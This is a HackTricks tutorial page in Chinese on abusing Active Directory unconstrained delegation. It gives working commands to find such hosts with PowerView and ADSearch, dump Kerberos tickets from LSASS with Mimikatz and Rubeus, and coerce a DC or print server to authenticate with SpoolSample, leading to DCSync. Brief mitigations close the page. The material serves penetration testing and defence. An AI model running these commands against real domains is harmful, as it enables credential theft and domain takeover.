HackTricksUnconstrained Delegation
Reading time: 5 minutes
tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:
HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
Unconstrained delegation
这是一个域管理员可以设置给域内任何计算机的功能。然后,每当用户登录到该计算机时,该用户的TGT副本将被发送到DC提供的TGS中并保存在LSASS的内存中。因此,如果您在该机器上拥有管理员权限,您将能够转储票证并冒充用户在任何机器上。
因此,如果域管理员登录到启用了“无约束委派”功能的计算机,并且您在该机器上拥有本地管理员权限,您将能够转储票证并在任何地方冒充域管理员(域权限提升)。
您可以通过检查userAccountControl属性是否包含ADS_UF_TRUSTED_FOR_DELEGATION来查找具有此属性的计算机对象。您可以使用LDAP过滤器‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’来做到这一点,这正是powerview所做的:
# List unconstrained computers
## Powerview
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer –Unconstrained –Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs
加载管理员(或受害者用户)的票证到内存中,使用Mimikatz或Rubeus进行票证传递。
更多信息:https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
关于不受约束委派的更多信息在ired.team。
强制认证
如果攻击者能够攻陷一个被允许进行“无约束委派”的计算机,他可以欺骗一个打印服务器,使其自动登录并在服务器的内存中保存TGT。
然后,攻击者可以执行票证传递攻击以冒充用户打印服务器计算机帐户。
要使打印服务器登录到任何机器,可以使用SpoolSample:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
如果 TGT 来自域控制器,您可以执行 DCSync 攻击 并从 DC 获取所有哈希。
有关此攻击的更多信息,请访问 ired.team。
在这里找到其他 强制身份验证 的方法:
Force NTLM Privileged Authentication
缓解措施
- 限制 DA/Admin 登录到特定服务
- 为特权账户设置“账户是敏感的,无法被委派”。
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。